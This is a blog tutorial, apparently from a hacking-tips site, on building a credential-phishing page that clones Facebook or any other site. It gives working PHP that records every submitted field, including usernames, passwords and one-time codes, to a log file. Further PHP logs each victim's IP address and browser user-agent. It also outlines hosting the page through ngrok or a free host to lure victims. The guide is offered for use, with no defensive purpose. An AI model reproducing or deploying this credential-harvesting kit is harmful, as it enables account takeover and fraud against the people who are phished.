Hello guy's, Welcome to another article, Recently i have post lot's of article about creating phishing page. Although the principle behind each guide is slimier. In this post I will explain all necessary step's to create phishing page. So this guide will help you to make your own phishing page at any site.
What is phishing?
Phishing is when someone tries to get access to your Facebook account by sending you a suspicious message or link that asks for your personal information. If they get into your account, they may use your account to send spam.Requirement's
- Any Device
- Chrome Browser
Feature's
- Get username and password
- Get User-Agent information
- Get Otp
How to create phishing page
Step 1: Download HTML index page of Target
First you choose your target web page. Once you selected you target go to that web page like I'm choose Facebook
Step 2: Creating Php file For Password Harvesting
Now we need to create php file to harvesting the username and password so copy this below code and past your note pad name of "login.php"
<?phpheader ('Location: facebook.com');$handle = fopen("log.txt", "a");foreach($_POST as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n\n\n\n");fclose($handle);exit;?>
If you need to crate any other website phishing page you need to change one small thing to " login.php" file that is replace "facebook.com" in header value and type which website to you make without "Https or Http" and "www"
Step 3: create php file to get user-agent information
Now we need to create another php file to capture victim "user-agent" information so you copy this below all command and past your note pad and save it with the name of "ip.php"
<?phpif (!empty($_SERVER['HTTP_CLIENT_IP'])){$ipaddress = $_SERVER['HTTP_CLIENT_IP']."\r\n";}elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']."\r\n";}else{$ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";}$useragent = " User-Agent: ";$browser = $_SERVER['HTTP_USER_AGENT'];$file = 'ip.txt';$victim = "IP: ";$fp = fopen($file, 'a');fwrite($fp, $victim);fwrite($fp, $ipaddress);fwrite($fp, $useragent);fwrite($fp, $browser);fclose($fp);
Step 3: Connect all files into one file
Once you complete above all step's you have 3 files now connect all three file's into one file so copy this below command and past your note pad with the name of "index.php"
<?phpinclude 'ip.php';header('Location: login.html');exit?>
Step 4: Host phishing page
More way's are there to hosting phishing page's but now we discuss'd two method first method is host you linux or termux with ngrok
First you open terminal inside the phishing page's and type this below command
Step 5: Victim View
Once your victim click Ngrok link that link will show this below image
If your victim type any data on this page
If you don't know how to host phishing page in 000webhost please Read this below article.




















Bro please tell me the password for the zip file please ��������
ReplyDeleteerrorsfind.com
ReplyDelete